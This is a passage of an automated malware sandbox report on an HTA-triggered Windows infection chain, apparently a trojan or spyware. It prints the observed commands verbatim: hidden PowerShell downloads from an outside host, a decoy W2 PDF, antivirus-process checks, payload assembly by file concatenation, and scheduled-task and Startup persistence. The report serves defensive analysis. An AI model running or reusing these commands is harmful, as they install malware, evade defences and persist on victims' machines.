    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CAE87F38_2_00CAE87F
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CA6ADE38_2_00CA6ADE
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CE2A0538_2_00CE2A05
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CD8BFF38_2_00CD8BFF
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C8CD7A38_2_00C8CD7A
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C9CE1038_2_00C9CE10
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CA715938_2_00CA7159
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C7924038_2_00C79240
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00D0531138_2_00D05311
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C796E038_2_00C796E0
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C9170438_2_00C91704
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C91A7638_2_00C91A76
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C97B8B38_2_00C97B8B
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C79B6038_2_00C79B60
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C97DBA38_2_00C97DBA
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C91D2038_2_00C91D20
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C91FE738_2_00C91FE7
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: String function: 004062A3 appears 58 times
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: String function: 00C8FD52 appears 40 times
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: String function: 00C90DA0 appears 46 times
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@72/99@9/3
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CE41FA GetLastError,FormatMessageW,38_2_00CE41FA
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CD2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,38_2_00CD2010
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CD1A0B AdjustTokenPrivileges,CloseHandle,38_2_00CD1A0B
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,13_2_004044A5
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CDDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,38_2_00CDDD87
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_004024FB CoCreateInstance,13_2_004024FB
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CE3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,38_2_00CE3A0E
    Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0o8vth[1].batJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8760:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8920:120:WilError_03
    Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Temp\temp.batJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2044 --field-trial-handle=1728,i,16385498434607258670,18278990784431365219,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2044 --field-trial-handle=1728,i,16385498434607258670,18278990784431365219,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msxml6.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msdart.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
